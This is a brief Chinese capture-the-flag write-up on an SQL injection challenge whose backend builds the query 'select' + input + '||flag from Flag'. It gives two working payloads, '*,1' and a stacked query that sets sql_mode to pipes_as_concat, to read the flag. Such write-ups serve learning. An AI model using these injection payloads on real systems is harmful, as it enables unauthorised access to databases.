打开后显示如下:
payload为数字时有回显,为字符串时没有回显
看大佬的wp得知,此时的内置sql语句为sql=“select”.post[‘query’]."||flag from Flag";
解法一
当payload为*,1时,执行的sql语句为select *,1||flag from Flag
相当于select 1 from Flag
于是
得到flag
解法二(预期解法)
payload为1;set sql_mode=pipes_as_concat;select 1
此时执行的语句为
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag
得到flag
